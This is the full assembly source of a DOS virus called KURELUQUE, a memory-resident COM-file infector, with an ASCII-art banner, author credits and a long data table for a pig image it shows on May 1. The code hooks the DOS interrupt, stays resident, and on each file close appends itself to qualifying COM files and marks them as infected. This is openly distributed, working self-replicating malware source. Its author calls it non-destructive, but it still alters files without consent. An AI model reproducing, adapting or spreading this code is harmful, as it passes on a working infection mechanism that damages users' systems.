;VIRUS;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;SURIV;;;;;
;;VIRUS;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;SURIV;;;;;;
;;;VIRUS;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;SURIV;;;;;;;
;;;;VIRUS; €  € ;;;;;;;;;;;;;;;;;; € ;;;;;;;;;;;;;;;;;;;;;;;;;;;;SURIV;;;;;;;;
;;;;;VIRUS €  € ‹  ‹ ‹ ‹‹  ‹‹‹‹ ;; € ;;; ‹  ‹ ;‹‹‹;;‹;;‹; ‹‹‹‹ ;SURIV;;;;;;;;;
;;;;;;;;;; €ﬂ€  €  € €ﬂ ; €    € ; € ;;; €  € €   € €  € €    € ;;;;;;;;;;;;;;
;;;;;;;;;; € ﬂ€ €  € € ;; €ﬂﬂﬂﬂ ;; € ;;; €  € €   € €  € €ﬂﬂﬂﬂ ;;;;;;;;;;;;;;;
;;;;VIRUS; €  € €‹‹€ € ;; ﬂ‹‹‹‹ﬂ ; €‹‹‹‹ €‹‹€ ﬂ‹‹‹€ €‹‹€ ﬂ‹‹‹‹ﬂ SURIV;;;;;;;;;
;;;VIRUS;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; € ;;;;;;;;;;;;;SURIV;;;;;;;;
;;VIRUS;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ﬂ€ﬂ XH;;;;;;;;;;;SURIV;;;;;;;
;VIRUS;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;SURIV;;;;;;
 ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;  ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
;                                                                            ;
;ƒƒƒ Coded by Xavirus Hacker in Paraguay. TSR COM infector on close virus ƒƒƒ;
;                                                                            ;
 ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;  ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
;;;;; Thanx  to  Int13h for da help and specially for the little compresion ;;
;;;;;;;;;;;;; algorithm idea (it packed the gfx to almost 70%) ;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;; Also thanx to Insane for the nice pigture ;) ;;;;;;;;;;;;;;;
;;;;;;; The pig is the mascote of the Club Sportivo Luque§o. Kure means ;;;;;;
;;;;;;;;;;;;;;; pig in guaran° (paraguayan language). ;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;; We (Int13h, Insane and me) are fanatics of that club :) ;;;;;;;;;;;;;;
;;;;;;;;;;;;;;; May 1, remembers the foundation aniversary. ;;;;;;;;;;;;;;;;;;
;;;; This virus won't be in the wild, I didn't worried about encryption ;;;;;;
;;;;;;;;; or stealth. The main purpose of this sucker is to carry the ;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;; graphic and display it on may 1. ;;;;;;;;;;;;;;;;;;;;;;
;;;;; It has a dummy error handler and marks infected files by setting ;;;;;;;
;;;;;; the seconds to 62. No destructive code, I'll go to heaven :-) ;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

.Model Tiny
.Code
Org 100h

Grandeza = (Offset Rekcah-Offset Surivax)
P1       = ((Grandeza+15)/16)+1
P2       = ((Grandeza+15)/16)

Surivax:
 Call   Master

Master:
 Pop    Bp
 Sub    Bp,Offset Master

 Push   Ax
 Pop    Ax
 Dec    Sp
 Dec    Sp
 Pop    Bx
 Sub    Ax,Bx
 Jz     Follow_the_sign

 Db     02eh
 Int    19h
 Nop

Follow_the_sign:
 Mov    Ax,'KU'
 Int    21h

 Cmp    Ax,'RE'
 Je     Ya_en_memoria

 Mov    Ax,3521h
 Int    21h
 Mov    Cs:[Bp+Word Ptr OldVector21h+2],Es
 Mov    Cs:[Bp+Word Ptr OldVector21h],Bx

 Mov    Ax,Ds
 Dec    Ax
 Mov    Es,Ax
 Mov    Ax,Es:[3]
 Sub    Ax,P1
 Xchg   Bx,Ax
 Push   Ds
 Pop    Es
 Mov    Ah,4ah
 Int    21h
 Mov    Ah,48h
 Mov    Bx,P2
 Int    21h
 Push   Ax
 Dec    Ax
 Mov    Es,Ax
 Mov    Word Ptr Es:[1],8
 Pop    Ax
 Mov    Es,Ax
 Xor    Di,Di
 Mov    Ax,Cs
 Mov    Ds,Ax
 Lea    Si,[Bp+offset Surivax]
 Mov    Cx,Grandeza
 rep    Movsb
 Mov    Ax,Es
 Mov    Ds,Ax
 Mov    Ax,2521h
 Mov    Dx,(offset IntVeintiuno-100h)
 Int    21h


Ya_en_memoria:
 Cld
 Push   Cs
 Pop    Ds

 Mov    Ah,2ah
 Int    21h

 Cmp   Dx,0501h
 Je    Payload
 Jmp   NoPayload

Payload:
 Mov    Ah,0fh
 int    10h
 Xor    Ah,Ah
 Push   Ax
 Mov    Ax,0013h
 Int    010h
 Mov    Cx,28d
 Xor    Bx,Bx
 Lea    Si,[Bp+offset Paleta]

SeteoLaPaleta:
 Mov    Dx,03c8h
 Mov    Al,Bl
 Out    Dx,Al
 Lodsb
 Mov    Dx,03c9h
 Out    Dx,Al
 Lodsb
 Out    Dx,Al
 Lodsb
 Out    Dx,Al
 Inc    Bl
 Loop   SeteoLaPaleta

 Mov    Word Ptr [Bp+X],102
 Mov    Word Ptr [Bp+Y],38
 Mov    Byte Ptr [Bp+Color],0
 Lea    Si,[Bp+offset Chancho]

PonerGrafico:
 Lodsw
 Cmp    Ah,50
 Jbe    NoEstaComprimido

 Sub    Ah,50
 Xor    Cx,Cx
 Mov    Cl,Ah
 Mov    Byte Ptr [Bp+Color],Al

Descomprimir:
 Call   Pinta_Pixel
 Inc    Word Ptr [Bp+X]
 Dec    Cx
 Or     Cx,Cx
 Jz     Escape
 Cmp    Word Ptr [Bp+X],218
 jb     Descomprimir

 Inc    Word Ptr [Bp+Y]
 Cmp    Word Ptr [Bp+Y],162
 Je     Termino
 Mov    Word Ptr [Bp+X],102
 Or     Cx,Cx
 Jnz    Descomprimir

Escape:
 Inc    Si

NoEstaComprimido:
 Dec    Si
 Mov    Byte Ptr [Bp+Color],Al
 Call   Pinta_Pixel
 Inc    Word Ptr [Bp+X]
 Cmp    Word Ptr [Bp+X],218
 Jne    PonerGrafico

 Inc    Word Ptr [Bp+Y]
 Mov    Word Ptr [Bp+X],102
 Cmp    Word Ptr [Bp+Y],162
 Jne    PonerGrafico


Termino:
 Xor    Ax,Ax
 Int    16h
 Pop    Ax
 Int    10h


NoPayload:
 Push   Cs
 Push   Cs
 Pop    Ds
 Pop    Es


 Lea    Si,[Bp+offset DelHoste]
 Mov    Di,100h
 Mov    Dx,Di
 Movsb
 Movsw

 Xor    Ax,Ax
 Xor    Bx,Bx
 Xor    Cx,Cx
 Xor    Si,Si
 Xor    Di,Di
 Xor    Bp,Bp
 Jmp    Dx


BigJump    Db 0e9h,00h,00h
           Db ' [ KURELUQUE Virus ] '
           Db ' Coded by Xavirus Hacker. Picture by Insane '
           Db ' ≠≠≠Arriba Sportivo Luque§o Campe¢n!!! '
           Db ' Un d°a como hoy, naci¢ el glorioso club '
           Db ' { MADE IN LUQUE - PARAGUAY } '
DelHoste   Db 090h,0cdh,020h
Trapper    Dw ?,?
Reloj      Dw 0
Calendario Dw 0
Color      Db 0
Y          Dw 0
X          Dw 0


IntVeintiuno proc far
 Cmp    Ax,'KU'
 Je     Estas_Ahi
 Cmp    Ah,3eh
 Je     Contaminar
MS_DOS:
              Db 0eah
 OldVector21h Dw 0,0
 Ret
Estas_Ahi:
 Mov    Ax,'RE'
 Iret
IntVeintiuno endp


Handler24h proc near
 Xor    Al,Al
 Iret
Handler24h endp



Muletilla:
 Jmp    MS_DOS

Cerradura2:
 Jmp    Cerradura1


Contaminar:
 Cmp    Bx,4
 Jbe    Muletilla
 Push   Ax
 Push   Bx
 Push   Cx
 Push   Dx
 Push   Si
 Push   Di
 Push   Ds
 Push   Es
 Push   Bx
 Push   Dx
 Push   Ds

 Mov    Ax,3524h
 Int    21h
 Mov    Word Ptr Cs:[Trapper-100h],Bx
 Mov    Word Ptr Cs:[(Trapper-100h)+2],Es

 Push   Cs
 Pop    Ds

 Mov    Ax,2524h
 Mov    Dx,(offset Handler24h-100h)
 Int    21h

 Pop    Ds
 Pop    Dx
 Pop    Bx

 Push   Bx
 Mov    Ax,1220h
 Int    2fh

 Mov    Ax,1216h
 Xor    Bh,Bh
 Mov    Bl,Es:[Di]
 Int    2fh
 Pop    Bx

 Cmp    Word Ptr Es:[Di+29h],'MO'
 Jne    Cerradura2
 Cmp    Byte Ptr Es:[Di+28h],'C'
 Jne    Cerradura2

 Mov    Byte Ptr Es:[Di+4],20h
 Mov    Byte Ptr Es:[Di+2],02
 Mov    Word Ptr Es:[Di+015h],00
 Mov    Word Ptr Es:[Di+017h],00

 Mov    Ax,5700h
 Int    21h

 Mov    Word Ptr Cs:[Calendario-100h],Dx
 Mov    Word Ptr Cs:[Reloj-100h],Cx
 And    Cl,01fh
 Cmp    Cl,01fh
 Je     Cerradura2

 Push   Cs
 Pop    Ds

 Mov    Ah,03fh
 Mov    Dx,(offset DelHoste-100h)
 Mov    Cx,3
 Int    21h

 Mov    Si,Dx
 Cmp    Word Ptr [Si],'ZM'
 Je     Cerradura1
 Cmp    Word Ptr [Si],'MZ'
 Je     Cerradura1

 Mov    Ax,4202h
 Xor    Cx,Cx
 Cwd
 Int    21h

 Or     Dx,Dx
 Jnz    Cerradura1

 Cmp    Ax,1000
 Jbe    Cerradura1

 Cmp    Ax,58000d
 Ja     Cerradura1

 Sub    Ax,3
 Mov    Word Ptr [BigJump-100h+1],Ax

 Mov    Ah,40h
 Mov    Cx,Grandeza
 Xor    Dx,Dx
 Int    21h

 Mov    Ax,4200h
 Xor    Cx,Cx
 Cwd
 Int    21h

 Mov    Ah,40h
 Mov    Dx,(offset BigJump-100h)
 Mov    Cx,3
 Int    21h

 Mov    Dx,Word Ptr Cs:[Calendario-100h]
 Mov    Cx,Word Ptr Cs:[Reloj-100h]
 And    Cl,0e0h
 Or     Cl,01fh
 Mov    Ax,5701h
 Int    21h

Cerradura1:
 Push   Cs
 Pop    Ds

 Mov    Ax,2524h
 Lds    Dx,Dword Ptr [Trapper-100h]
 Int    21h

 Pop    Es
 Pop    Ds
 Pop    Di
 Pop    Si
 Pop    Dx
 Pop    Cx
 Pop    Bx
 Pop    Ax
 Jmp    MS_DOS



Pinta_Pixel:
 Mov    Di,0a000h
 Mov    Es,Di
 Mov    Ax,320d
 Mul    Word Ptr [Bp+Y]
 Mov    Di,Ax
 Add    Di,Word Ptr [Bp+X]
 Mov    Al,Byte Ptr [Bp+Color]
 Stosb
 Ret



Paleta:
Db 035,025,027,041,029,032,047,034,037,054,039,042,055,043
Db 046,057,048,049,059,053,054,061,057,058,063,063,063,036
Db 030,046,038,033,047,041,037,048,043,040,049,046,044,050
Db 049,048,051,052,052,052,052,052,043,053,052,035,054,053
Db 026,055,053,017,063,053,000,057,054,000,051,057,042,041
Db 051,025,032,045,010,024,039,000,049,025,025,027,027,027


; Object: Chancho    Lenght: 14384 bytes   Compressed: 4600 bytes (+o-)

Chancho:
Db 2,165,2,0,162,0,2,2,0,83,1,2,4,6,4,0,124,2,2,0,71,4,7,53,6,4,2,1,0,0
Db 1,2,4,6,7,6,0,78,2,4,6,7,52,4,2,0,87,2,2,0,71,6,7,57,0,0,2,4,6,7,4,7
Db 0,79,6,7,7,4,4,7,4,0,87,2,2,0,71,7,2,4,6,7,53,6,0,1,4,6,7,4,2,1,0,78
Db 1,7,52,1,2,4,6,0,87,2,2,0,71,7,0,55,6,4,0,2,6,7,4,2,1,0,79,2,7,7,6,0
Db 1,2,7,0,87,2,2,0,71,6,0,55,7,2,0,4,7,4,2,1,0,80,4,7,6,4,0,0,1,7,0,87
Db 2,2,0,71,4,0,55,7,1,1,6,7,2,1,0,81,6,7,4,2,0,0,0,7,0,87,2,2,0,71,2,0
Db 55,7,1,2,7,4,1,0,82,7,6,2,1, 0,52,7,0,87,2,2,0,71,1,1,0,53,1,6,1,4,2
Db 1,0,82,1,7,4,1,0,52,1,7,0,87, 2,2,0,77,2,4,2,6,1,0,83,2,7,2,0,53,2,7
Db 0,87,2,2,0,76,1,4,2,4,7,0,84, 4,7,1,0,53,4,6,0,87,2,2,0,76,2,6,4,6,7
Db 0,83,1,6,7,0,54,7,4,0,87,2,2,0,76,4,7,6,7,6,0,83,2,7,6,0,94,2,2,0,76
Db 6,7,52,4,0,83,4,7,4,0,94,2,2, 0,75,1,7,6,6,7,2,0,83,6,7,2,0,94,2,2,0
Db 75,2,7,6,4,7,1,0,82,1,7,6,1,0,94,2,2,0,75,4,7,7,6,7,0,62,2,6,7,7,4,0
Db 4,4,6,7,3,0,59,2,7,4,0,65,4,6, 7,7,6,7,0,4,0,52,4,0,1,4,6,7,7,3,0,60
Db 2,2,0,74,1,6,7,53,0,0,1,2,7,6,0, 0,7,3,0,0,7,6,2,4,6,7,2,7,0,0,4,7,0
Db 59,4,7,2,0,57,7,3,0,0,7,3,0,1,6, 7,4,2,7,7,0,7,0,0,1,7,0,2,6,5,3,1,7
Db 0,60,2,2,0,74,2,7,7,6,7,6,0,53,4,7,0,0,6,7,0,0,2,7,0,2,6,7,4,7,0,1,4
Db 7,0,58,1,6,7,1,0,57,4,7,0,0,2,7, 0,4,7,4,2,4,7,4,1,7,0,0,2,7,0,4,5,3
Db 1,2,7,0,60,2,2,0,73,1,4,7,6,4,7,4,0,52,1,7,6,0,1,7,7,0,0,4,7,0,1,7,4
Db 7,6,1,2,6,7,0,58,2,7,6,0,58,7,7,0, 0,4,7,0,6,7,2,2,6,7,2,2,7,0,0,4,7
Db 0,6,3,1,2,4,7,0,60,2,2,0,66,1,0,55, 2,6,7,6,2,7,2,0,52,2,7,4,0,2,7,7
Db 0,0,6,7,0,0,6,2,7,2,2,4,7,7,0,57,1, 4,7,4,0,55,1,0,1,7,6,0,1,6,7,0,7
Db 4,1,4,7,4,1,4,7,0,0,6,7,0,7,1,2,4,6,7,0,60,2,2,0,66,2,0,54,1,4,7,6,4
Db 1,7,1,0,52,4,7,2,0,4,7,6,0,1,7,6,0,0, 4,1,7,2,4,6,7,4,4,6,7,54,6,4,6
Db 7,2,0,54,1,2,0,2,7,4,0,2,7,6,4,7,2,0,6,7,2,0,7,6,0,1,7,6,0,7,2,4,6,7
Db 4,0,60,2,2,0,66,4,1,0,52,1,2,6,7,4,2,0, 7,0,53,6,7,1,1,6,7,4,0,2,7,4
Db 0,0,2,0,7,53,6,0,58,2,7,7,1,0,53,1,2,4,0,4,7,2,0,4,7,4,6,7,1,1,7,4,1
Db 0,7,4,0,2,7,4,0,7,54,4,0,60,2,2,0,66,2,2, 1, 0,1,2,4,7,6,2,1,0,7,1,0
Db 52,7,6,1,2,7,7,2,1,4,6,2,0,0,1,0,7,1,0,61,4,7,6,0,53,1,2,4,6,0,6,7,1
Db 0,6,7,2,7,7,0,2,7,2,0,0,7,2,0,4,7,0,0,7,2,1,0,63,2,2,0,52,0,63,7,4,2
Db 1,2,4,6,7,4,1,0,0,7,2,1,0,0,7,4,2,4,7,7,1,2,6,4,1,0,0,0,0,7,4,1,0,60
Db 6,7,4,0,0,0,1,2,4,6,7,0,7,6,0,0,7,7,1,7,7,0,4, 7,1,0,0,7,2,0,6,7,0,0
Db 7,4,2,1,0,62,2,2,0,66,7,6,4,2,4,6,7,7,2,0,52,7,4,2,1,0,7,2,4,6,7,6,2
Db 4,7,4,2,1,0,0,0,7,6,4,1,0,59,7,6,4,7,7,6,4,4,6,7,6,0,7,4,0,0,7,6,0,7
Db 7,0,6,7,0,52,7,4,1,7,7,0,0,7,6,4,2,1,0,61,2,2,0,66,6,7,6,4,6,7,7,6,1
Db 0,52,7,6,4,2,1,7,4,6,7,7,4,4,6,7,6,4,2,1,0,0,7,7,6,4,7,0,58,7,59,4,0
Db 7,2,0,0,7,4,2,6,7,1,7,4,0,52,5,6,2,7,6,0,0,7,7,6,6,7,0,61,2,2,0,66,4
Db 6,7,53,6,4,0,53,6,7,7,6,4,6,7,7,6,7,7,6, 7, 52,6,4,2,1,0,6,7,7,6,4,0
Db 58,7,6,4,4,6,7,53,6,2,0,4,7,7,6,7,7,4,4,6,2,7,2,0,52,3,5,4,7,7,0,0,4
Db 7,52,4,0,61,2,2,0,131,1,4,4,7,1,0,76,2,2, 0,132,1,6,7,0,77,2,2,0,133
Db 7,6,0,77,2,2,0,133,7,2,0,77,2,2,0,133,7,1, 0,77,2,2,0,116,1,0,65,7,0
Db 78,2,2,0,96,1,2,56,1,0,60,2,1,0,64,4,0,78,2,2,0,92,1,2,66,1,0,53,1,2
Db 2,0,64,2,0,78,2,2,0,90,1,1,2,52,3,61,2,54, 1, 0,1,2,3,2,1,0,0,62,1,0
Db 78,2,2,0,88,1,2,53,3,54,4,56,3,55,2,2,1,2, 3,4,3,2,0,93,2,2,0,87,1,2
Db 52,3,3,2,1,2,3,4,52,5,53,4,4,3,3,2,1,52,2,52,3,4,3,2,0,93,2,2,0,86,1
Db 2,52,3,2,1,1,2,3,4,52,5,5,6,6,5,52,4,3,53,2,1,1,2,2,3,3,2,1,0,92,2,2
Db 0,77,1,2,52,1,0,52,1,2,2,3,2,1,1,2,3,3,4,4,4,5,5,6,54,5,5,4,3,56,2,2
Db 3,3,2,0,92,2,2,0,78,1,2,1,2,52,1,2,52,1,1,2, 3,55,4,4,5,5,6,53,5,5,4
Db 4,3,56,2,2,3,2,0,92,2,2,0,79,2,1,1,2,53,3,54, 2,55,3,4,4,5,5,6,6,5,5
Db 4,52,3,2,54,2,3,3,2,3,0,56,1,52,0,82,2,2,0,79, 2,2,1,0,1,2,3,2,3,3,4
Db 3,2,3,4,5,5,4,3,2,3,4,4,5,5,6,5,4,52,3,2,3,4,5,4,3,2,3,2,51,0,55,1,0
Db 1,53,0,80,2,2,0,79,1,2,0,0,2,3,52,4,3,2,3,4,5,6,16,52,4,2,3,4,4,5,52
Db 4,4,3,2,3,4,5,6,16,16,4,2,3,2,2,0,54,1,1,0,1,53,0,1,52,0,76,2,2,0,80
Db 2,1,0,1,2,3,3,4,2,3,4,5,6,16,22,52,23,24,2,3,4,54, 3,2,3,4,5,6,16,22
Db 22,23,24,2,52,0,54,1,1,1,0,1,1,0,0,2,52,1,0,75,2,2, 0,80,1,2,0,0,2,3
Db 3,4,2,4,5,6,16,22,22,23,24,25,25,2,3,3,4,53,3,2,4,5,6,16,22,23,24,25
Db 25,2,3,2,0,55,1,1,1,0,0,0,1,2,53,1,0,74,2,2,0,81,2,0,0,2,2,3,4,2,5,6
Db 16,22,8,22,24,25,25,0,2,3,54,4,3,2,5,6,16,8,22,24, 25,25,0,2,4,2,0,0
Db 0,0,0,0,1,52,0,52,1,2,3,52,2,1,0,73,2,2,0,81,2,0,0, 1,2,3,3,2,5,6,16
Db 22,22,23,25,25,0,0,2,3,2,52,3,52,2,4,5,16,22,23,25,25,0,0,2,3,2,0,56
Db 1,0,0,1,52,2,2,3,3,2,2,1,0,72,2,2,0,81,2,1,0,1,2,2, 3,3,4,5,16,22,23
Db 24,25,0,52,2,2,3,55,2,3,4,16,23,24,25,0,52,2,52,0,58,1,2,54,3,52,2,2
Db 1,0,71,2,2,0,81,1,2,1,2,52,3,3,2,59,3,3,2,54,3,3,2,61,1,0,56,1,2,2,3
Db 54,4,3,52,2,2,1,0,69,2,2,0,81,1,2,59,3,57,2,3,4,4,3, 52,2,2,3,59,2,2
Db 1,0,56,1,2,2,3,52,4,53,3,52,2,2,1,0,67,2,2,0,80,1,2,52, 3,57,4,3,4,3
Db 2,3,3,2,3,3,2,3,3,53,2,3,53,4,54,3,3,2,2,1,0,58,1,2,2,3,3, 4,4,5,4,4
Db 3,51,2,2,1,0,65,2,2,0,79,1,2,52,3,59,4,3,3,2,4,2,3,3,2,3,4,3,3,4,3,3
Db 2,3,3,4,4,5,52,4,4,3,3,2,2,1,0,58,1,2,3,3,4,4,5,4,52,3,52,2,2,1,0,63
Db 2,2,0,79,2,52,3,3,4,57,3,3,4,3,2,4,2,4,2,3,4,3,53,4,3,3,2,3,4,52,5,6
Db 5,4,4,3,3,2,2,0,59,1,2,3,3,4,4,5,5,4,52,3,52,2,1,0,62,2,2,0,78,1,2,2
Db 3,3,4,52,5,52,4,53,3,52,2,3,2,5,2,3,58,2,3,4,3,4,4,5,6,5,4,4,3,3,2,1
Db 0,59,1,2,3,3,4,4,5,6,5,4,52,3,3,2,1,0,61,2,2, 0,78,2,2,3,3,4,52,5,56
Db 4,4,3,53,2,4,2,3,2,2,3,4,3,2,2,3,2,3,53,4,5,6,6,5,4,4,3,2,2,0,60,1,2
Db 3,3,4,4,5,6,6,5,4,4,3,3,2,1,0,60,2,2,0,77,1,2,3,3,4,52,5,5,6,53,5,52
Db 4,4,3,52,2,3,2,3,2,2,3,52,2,2,3,2,3,3,2,3,4,4,5,6,5,5,4,3,3,2,1,0,60
Db 1,2,3,3,4,52,5,6,5,4,4,3,3,2,0,60,2,2,0,77,2,2,3,3,4,4,5,5,6,55,5,52
Db 4,52,3,54,4,4,3,53,4,3,2,3,3,2,3,3,4,4,5,6,5, 4,4,3,2,2,0,61,1,2,3,3
Db 3,4,55,3,3,2,0,60,2,2,0,77,2,2,3,3,4,4,5,6,52, 7, 7,6,52,5,52,4,52,3
Db 54,4,3,52,4,3,2,3,2,2,1,2,3,3,4,4,5,52,4,3,2,2, 0,61,1,2,53,3,3,4,53
Db 3,2,1,0,60,2,2,0,77,2,3,52,4,4,5,6,6,7,53,6,6,5,5,4,52,3,4,3,58,2,52
Db 1,0,1,2,2,3,3,4,4,5,4,4,3,2,2,0,59,1,2,2,3,54,4,3,4,4,3,2,1,0,61,2,2
Db 0,77,2,2,3,3,4,4,5,6,6,7,53,6,6,5,5,4,3,56,2,55,1,0,53,2,3,3,2,3,3,4
Db 5,4,4,3,2,2,0,58,1,2,3,3,4,57,3,2,1,0,62,2,2,0,68,1,1,0,1,0,54,2,2,3
Db 3,4,4,5,5,6,7,53,6,6,5,5,4,3,2,56,1,0,57,1,2,3,52,2,3,4,52,3,3,2,2,0
Db 56,1,2,2,3,4,52,5,53,4,4,3,2,1,0,63,2,2,0,67,1,1,0,1, 1,0,54,1,2,3,3
Db 4,4,5,5,6,6,7,7,6,6,5,5,4,3,2,1,0,56,27,53,0,53,2,3,3, 4,3,52,4,52,3
Db 2,2,1,0,54,1,2,2,3,3,4,4,5,5,6,6,5,4,4,3,2,1,0,64,2,2,0, 66, 1,1,0,1
Db 52,0,55,2,2,3,3,4,4,5,5,6,53,5,5,4,3,2,3,2,1,0,52,27,54,0,26, 53,1,2
Db 3,4,53,3,3,4,3,3,2,2,0,54,1,2,3,3,4,52,5,5,6,5,5,4,4,3,2,1,0, 65,2,2
Db 0,65,1,1,0,1,52,0,56,1,2,2,3,3,4,4,5,5,6,6,5,5,4,3,53,2,2,1,0,27,0,0
Db 26,26,1,26,53,1,2,3,4,4,5,4,54,3,2,2,1,0,53,1, 9,53,2,3,4,52,5,5,4,4
Db 3,2,1,0,66,2,2,0,65,1,1,0,1,52,0,57,2,52,3,3,4,4,5,54,4,54,3,2,2,1,0
Db 0,26,52,1,26,52,1,2,3,4,4,5,52,4,52,3,3,2,2,1,0, 0,1,1,9,10,11,11,10
Db 9,9,2,3,4,53,3,2,1,0,67,2,2,0,66,1,0,1,1,0,1,1,0, 55,1,2,52,3,3,4,52
Db 5,53,4,53,3,3,2,2,1,26,57,2,3,4,4,5,5,4,53,3,3,2,2,1,53,9,56,10,10,9
Db 2,3,4,4,3,2,1,0,68,2,2,0,64,1,0,52,1,0,0,2,2,0,56,1,2,52,3,52,4,59,3
Db 52,2,2,26,54,2,2,3,3,4,5,4,52,3,52,2,52,1,9,61,11,10,9,3,52,2,1,0,69
Db 2,2,0,64,2,0,55,2,2,0,57,1,2,53,3,54,4,57,3,3,2,58,4, 53,3,52,2,53,1
Db 9,63,10,9,2,3,2,1,0,70,2,2,0,64,2,0,1,0,52,1,2,1,0,58, 1,1,2,53,3,54
Db 4,57,3,2,55,3,4,52,3,3,2,54,1,9,1,9,64,10,9,1,1,0,71,2, 2,0,64,2,0,2
Db 1,0,1,2,2,0,59,1,9,9,1,2,54,3,53,4,56,3,3,2,52,3,4,3,3,2, 55, 1,9,68
Db 11,9,1,0,72,2,2,0,64,2,1,2,2,1,2,52,0,58,1,9,54,1,2,55,3, 52, 4,52,3
Db 58,2,55,1,9,71,1,0,73,2,2,0,64,2,56,1,0,57,1,9,60,1,2,52,3,54,2,60,1
Db 9,73,1,0,74,2,2,0,64,2,2,3,2,53,1,0,55,1,9,64,1,2,62,1,9,76,1,0,75,2
Db 2,0,63,1,2,3,52,2,3,2,2,0,53,1,9,67,1,62,9,76,1,0,76,2,2,0, 63,2,2,3
Db 54,2,2,0,52,1,9,107,1,0,77,2,2,0,63,2,2,3,3,4,4,3,3,2,0,1,9, 108,1,0
Db 78,2,2,0,63,2,2,3,4,4,4,4,3,2,1,9,11,11, 9,105,1,0,79,2,2,0,63,2,2,3
Db 4,5,4,4,3,2,2,9,11,12,9,104,1,0,80,2,2,0, 63,2,3,3,4,5,4,4,3,2,3,2,9
Db 13,11,9,102,1,0,81,2,2,0,62,1,2,3,4,4,5,5, 4,3,2,2,3,9,12,12,9,103,0
Db 81,2,2,0,62,2,2,3,4,5,52,4,3,2,2,3,9,11,13,9,103,0,81,2,2,0,62,2,2,3
Db 4,5,52,4,3,3,2,3,2,9,14,9,102,10,0,81,2,2,0, 62,2,2,3,4,4,5,4,52,3,2
Db 3,3,9,13,11,9,101,11,0,81,2,2,0,62,2,2,3,3,4,54,3,53,9,12,12,9,99,10
Db 11,12,0,81,2,2,0,62,1,2,2,3,3,4,53,3,52,2,9,11, 9, 97,10,11,12,13,12
Db 13,0,81,2,2,0,63,1,2,2,3,3,4,3,52,2,52,9,9,1,0,0,10,13,12,11,10,9,88
Db 10,11,12,13,14,52,0,81,2,2,0,64,1,2,2,3,52,2,54,1, 0, 53,11,16,52,14
Db 13,12,11,10,9,81,10,11,12,13,14,16,52,14,13,0,81,2,2,0,65,1,2,54,1,0
Db 57,12,16,16,20,52,16,14,13,12,11,10,9,75,10,11,12,13, 14,16,20,52,16
Db 14,13,12,0,81,2,2,0,80,13,14,16,20,57,16,14,13,12,11, 10, 9,64,10,11
Db 12,13,14,16,20,57,16,14,13,12,11,0,81,2,2,0,80,12,13,14, 16,20,90,16
Db 14,13,12,11,9,1,0,80,2,2,0,80,11,12,13,14,16,20,88,16,14, 13,12,11,9
Db 52,0,80,2,2,0,80,10,11,12,13,14,16,20,86,16,14,13,12,11,9, 53,0,80,2
Db 2,0,80,9,9,11,12,13,14,16,20,84,16,14,13,12,11,9,54,0,80,2, 2,0,80,9
Db 52,11,12,13,14,16,20,82,16,14,13,12,11,9,55,0,80,2,2,0,80,9,53,11,12
Db 13,14,16,20,79,16,14,13,12,11,10,9,56,0,80,2,2,0,80,9,54,10,11,12,13
Db 14,16,20,75,16,14,13,12,11,10,9,57,1,0,80,2,2,0,80, 9,57,10,11,12,13
Db 14,16,20,70,16,14,13,12,11,10,9,59,0,81,2,2,0,80,9,60,10,11,12,13,14
Db 16,20,64,16,14,13,12,11,10,9,61,1,0,81,2,2,0,80,9,65, 10,11,12,13,14
Db 16,56,14,13,12,11,10,9,66,0,82,2,2,0,80,9,98,1,0,82,2, 2,0,80,1,9,97
Db 0,83,2,2,0,82,1,9,94,1,0,83,2,2,0,83,1,9,92,1,0,84,2,2,0,85,1,9,89,1
Db 0,85,2,2,0,87,1,9,86,1,0,86,2,2,0,89,1,9,82,1,0,88,2,2,0,92,1,9,77,1
Db 0,90,2,2,0,95,1,9,72,1,0,92,2,2,0,99,1,9,65,1,0,95,2,2,0,163,2,2,0,0
Db 12,12,0,57,12,0,62,8,8,0,8,8,0,83,12,53,0,12,52,0,63,8,52,0,73,2,2,0
Db 12,0,59,12,0,55,12,0,56,8,0,8,0,84,12, 0,53,12,0,56,12,0,58,8,0,74,2
Db 2,0,12,0,52,12,52,0,0,12,52,0,0,12,12, 0,0,12,0,56,8,52,0,0,8,52,0,8
Db 0,8,0,8,0,8,0,8,8,0,8,0,8,0,8,52,0,60,12, 0,53,12,0,0,12,0,12,0,0,12
Db 0,58,8,0,0,8,8,0,52,8,52,0,8,52,0,0,8,52,0,8,52,0,0,2,2,0,12,0,52,12
Db 0,12,0,12,0,0,12,0,12,0,12,0,59,0,8,0,54,8, 0,8,0,8,0,8,0,8,8,0,52,8
Db 0,8,0,8,0,62,12,0,52,12,52,0,12,0,12,0,61,8,0,0,8,0,8,0,8,0,55,8,0,8
